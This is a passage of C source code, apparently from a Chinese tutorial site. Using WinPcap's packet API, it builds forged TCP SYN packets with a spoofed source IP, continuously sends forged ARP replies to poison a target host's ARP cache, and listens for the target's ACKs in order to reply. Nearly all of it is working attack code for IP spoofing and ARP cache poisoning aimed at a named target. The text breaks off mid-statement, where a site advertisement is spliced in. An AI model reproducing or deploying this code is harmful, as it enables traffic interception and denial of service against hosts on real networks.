ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384); //设置为不分片
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP; //高层协议为TCP
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP); //源IP填为伪装主机的IP
ip_header.m_dIP=inet_addr(TARGET_IP); //目的IP
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
//填充TCP头部以及TCP选项:
tcp_header.m_dport=htons(targetPort);
tcp_header.m_sport=htons(sourcePort++);
tcp_header.m_seq=::GetTickCount(); //初始化序列号
tcp_header.m_ack=0;
tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
tcp_header.m_res2_flag=2; //标识为SYN包
tcp_header.m_win=htons(16384);
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
tcp_option.unKnown=htons(516);
tcp_option.maxSegSize=htons(1460); //MSS, 以太网一般为1460
tcp_option.no1=1;
tcp_option.no2=1;
tcp_option.SACK=htons(1026);
//计算TCP校验和:
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
//构造SYN数据帧:
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
//发送伪造的SYN包:
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket(); //给PACKET结构指针分配内存
PacketInitPacket(lpPacket,sendSynBuf,128); //初始化PACKET结构指针
if(PacketSetNumWrites(lpAdapter,1)==FALSE) //设置发送次数
{
printf("Warning: Unable to send more than one packet in a single write!\n");
continue;
}
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
continue;
}
PacketFreePacket(lpPacket); //释放PACKET结构指针
Sleep(100);
}
return 0;
}
DWORD WINAPI ArpCheat(void *pInfo)
{
CHEAT_ARP_INFO info={0};
memcpy(&info,pInfo,sizeof(CHEAT_ARP_INFO));
//伪造ARP应答包:
char s_mac[6]={0},d_mac[6]={0};
ET_HEADER et_header={0};
ARP_HEADER arp_header={0};
char buffer[64]={0};
StrToMac(LOCAL_MAC,s_mac); //源MAC地址
memcpy(et_header.eh_src,s_mac,6);
StrToMac(info.targetMAC,d_mac); //目的MAC地址
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0806); //类型为0x0806表示这是ARP包
arp_header.arp_hdr=htons(0x0001); //硬件地址类型以太网地址
arp_header.arp_pro=htons(0x0800); //协议地址类型为IP协议
arp_header.arp_hln=6; //硬件地址长度为6
arp_header.arp_pln=4; //协议地址长度为4
arp_header.arp_opt=htons(0x0002); //标识为ARP应答
arp_header.arp_spa=inet_addr(info.simulateIP); //source_ip
memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr(info.targetIP); //target_ip
memcpy(arp_header.arp_tha,et_header.eh_dst,6);
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
//发送伪造地ARP应答包:
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket(); //给PACKET结构指针分配内存
PacketInitPacket(lpPacket,buffer,64); //初始化PACKET结构指针
if(PacketSetNumWrites(lpAdapter,1)==FALSE) //设置发送次数
printf("warning: Unable to send more than one packet in a single write!\n");
while(TRUE)
{
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE) //不断发送伪造的ARP应答包达到欺骗目标主机的目的
{
printf("Error sending the packets!\n");
break;
}
Sleep(3000);
}
PacketFreePacket(lpPacket); //释放PACKET结构指针
return 0;
}
void ListenACK()
{
LPPACKET lpPacket;
char recvBuf[512]={0};
PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_DIRECTED); //设置网卡为直接模式
PacketSetBuff(lpAdapter,1024); //设置网卡接收数据包的缓冲区大小
PacketSetReadTimeout(lpAdapter,2); //设置接收到一个包后的“休息”时间
while(TRUE)
{
lpPacket=PacketAllocatePacket(); //给PACKET结构指针分配内存
PacketInitPacket(lpPacket,recvBuf,512); //初始化PACKET结构指针
if(PacketReceivePacket(lpAdapter,lpPacket,TRUE)==TRUE) //接收数据帧
AssayAndSendData(lpPacket); //分析数据包并发送ACK包
else
printf("Recv Error!\n");
//每次收包后重置lpPacket:
PacketFreePacket(lpPacket);
memset(recvBuf,0,512);
Sleep(10);
}
PacketFreePacket(lpPacket); //释放lpPacket
return;
}
USHORT CheckSum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
cksum += *(UCHAR*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void StrToMac(char *str,char *mac) //自定义的将字符串转换成mac地址的函数
{
char *str1;
int i;
int low,high;
char temp;
for(i=0;i<6;i++)
{
str1=str+1;
switch(*str)
{
case 'a':high=10;
break;
case 'b':high=11;
break;
case 'c':high=12;
break;
case 'd':high=13;
break;
case 'e':high=14;
break;
case 'f':high=15;
break;
default:temp=*str;
high=atoi(&temp);
}
switch(*str1)
{
case 'a':low=10;
break;
case 'b':low=11;
break;
case 'c':low=12;
break;
case 'd':low=13;
break;
case 'e':low=14;
break;
case 'f':low=15;
break;
default:temp=*str1;
low=atoi(&temp);
}
mac[i]=high*16+low;
str+=2;
}
}
void AssayAndSendData(LPPACKET lpPacket)
{
char *buf;
bpf_hdr *lpBpfhdr;
ET_HEADER *lpEthdr;
in_addr addr={0};
buf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)buf;
lpEthdr=(ET_HEADER *)(buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800)) //判断是否为IP包
{
IP_HEADER *lpIphdr=(IP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER));
if( ( inet_addr(SIMULATE_IP)==lpIphdr->m_dIP ) && ( inet_addr(TARGET_IP)==lpIphdr->m_sIP ) && (lpIphdr->m_protocol==IPPROTO_TCP) ) //判断所收到的数据包的传输层协议、源及目的IP
{
TCP_HEADER *lpTcphdr=(TCP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER)+sizeof(IP_HEADER));
if( ( (lpTcphdr->m_res2_flag & 0x10)!=0 ) && ( lpTcphdr->m_win!=0 ) ) //判断是否为带ACK标记的包并判断目标主机接收窗口是否已为0
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
char *data="ffantasyYD";
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800); //类型为0x0800表示这是IP包
ip_header.m_ver_hlen=(4<<4(北联网教程,专业提供视频软件下载)
……